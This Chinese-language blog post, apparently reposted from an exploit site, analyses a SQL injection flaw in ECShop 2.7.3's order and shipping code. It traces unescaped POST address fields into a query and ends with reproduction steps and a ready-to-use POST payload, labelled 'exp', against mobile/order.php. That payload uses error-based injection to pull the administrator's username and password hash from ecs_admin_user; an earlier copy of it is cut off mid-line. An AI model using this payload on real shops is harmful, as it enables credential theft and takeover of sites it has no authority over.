前段时间大概2012年圣诞节左右,在t00ls上看见ecshop注入漏洞,影响全版本,当时也下载了最新的程序分析了下,最近考试比较忙,今天刚考完,把我分析的记录下来。
漏洞关键文件:
/includes/lib_order.php
关键函数:
01 |
function available_shipping_list( $region_id_list ) |
02 |
{ |
03 |
$sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' . |
04 |
's.shipping_desc, s.insure, s.support_cod, a.configure ' . |
05 |
'FROM ' . $GLOBALS [ 'ecs' ]->table( 'shipping' ) . ' AS s, ' . |
06 |
$GLOBALS [ 'ecs' ]->table( 'shipping_area' ) . ' AS a, ' . |
07 |
$GLOBALS [ 'ecs' ]->table( 'area_region' ) . ' AS r ' . |
08 |
'WHERE r.region_id ' . db_create_in( $region_id_list ) . |
09 |
' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order' ; |
10 |
11 |
return $GLOBALS [ 'db' ]->getAll( $sql ); |
12 |
} |
第531行:
1 |
$shipping_list = available_shipping_list( $region ); |
再对传入变量进行追踪:
第530行:
1 |
$region = array ( $consignee [ 'country' ], $consignee [ 'province' ], $consignee [ 'city' ], $consignee [ 'district' ]); |
第473行:
1 |
$consignee = get_consignee( $_SESSION [ 'user_id' ]); |
到了一个关键函数:
/includes/lib_order.php
01 |
function get_consignee( $user_id ) |
02 |
{ |
03 |
if (isset( $_SESSION [ 'flow_consignee' ])) |
04 |
{ |
05 |
/* 如果存在session,则直接返回session中的收货人信息 */ |
06 |
07 |
return $_SESSION [ 'flow_consignee' ]; |
08 |
} |
09 |
else |
10 |
{ |
11 |
/* 如果不存在,则取得用户的默认收货人信息 */ |
12 |
$arr = array (); |
13 |
14 |
if ( $user_id > 0) |
15 |
{ |
16 |
/* 取默认地址 */ |
17 |
$sql = "SELECT ua.*" . |
18 |
" FROM " . $GLOBALS [ 'ecs' ]->table( 'user_address' ) . "AS ua, " . $GLOBALS [ 'ecs' ]->table( 'users' ). ' AS u ' . |
19 |
" WHERE u.user_id='$user_id' AND ua.address_id = u.address_id" ; |
20 |
21 |
$arr = $GLOBALS [ 'db' ]->getRow( $sql ); |
22 |
} |
23 |
24 |
return $arr ; |
25 |
} |
26 |
} |
显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢?
关键点:
第400行: $_SESSION['flow_consignee'] = stripslashes_deep($consignee);
这里对传入参数反转义存入$_SESSION中。
然后看下:
01 |
$consignee = array ( |
02 |
'address_id' => empty ( $_POST [ 'address_id' ]) ? 0 : intval ( $_POST [ 'address_id' ]), |
03 |
'consignee' => empty ( $_POST [ 'consignee' ]) ? '' : trim( $_POST [ 'consignee' ]), |
04 |
'country' => empty ( $_POST [ 'country' ]) ? '' : $_POST [ 'country' ], |
05 |
'province' => empty ( $_POST [ 'province' ]) ? '' : $_POST [ 'province' ], |
06 |
'city' => empty ( $_POST [ 'city' ]) ? '' : $_POST [ 'city' ], |
07 |
'district' => empty ( $_POST [ 'district' ]) ? '' : $_POST [ 'district' ], |
08 |
'email' => empty ( $_POST [ 'email' ]) ? '' : $_POST [ 'email' ], |
09 |
'address' => empty ( $_POST [ 'address' ]) ? '' : $_POST [ 'address' ], |
10 |
'zipcode' => empty ( $_POST [ 'zipcode' ]) ? '' : make_semiangle(trim( $_POST [ 'zipcode' ])), |
11 |
'tel' => empty ( $_POST [ 'tel' ]) ? '' : make_semiangle(trim( $_POST [ 'tel' ])), |
12 |
'mobile' => empty ( $_POST [ 'mobile' ]) ? '' : make_semiangle(trim( $_POST [ 'mobile' ])), |
13 |
'sign_building' => empty ( $_POST [ 'sign_building' ]) ? '' : $_POST [ 'sign_building' ], |
14 |
'best_time' => empty ( $_POST [ 'best_time' ]) ? '' : $_POST [ 'best_time' ], |
15 |
); |
好了注入就这样出现了。
==================
注入测试:
环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)
测试程序:ECShop_V2.7.3_UTF8_release1106
1.首先需要点击一个商品加入购物车
2.注册一个会员帐号
3.post提交数据
2 |
3 |
country=1&province=3') and ( select 1 from ( select count (*),concat(( select ( select ( SELECT concat(user_name,
|
=======================================
举一反三,我们根据这个漏洞我们可以继续深入挖掘:
我们搜寻关键函数function available_shipping_list()
在文件/moblie/order.php中出现有,次文件为手机浏览文件功能基本和flow.php相同,代码流程基本相同
利用exp:
1.点击一个商品,点击购买商标
2.登录会员帐号
3.post提交:
http://127.0.0.1/ecshop/mobile/order.php
country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=
from:http://lanu.sinaapp.com/0day/124.html
文章评论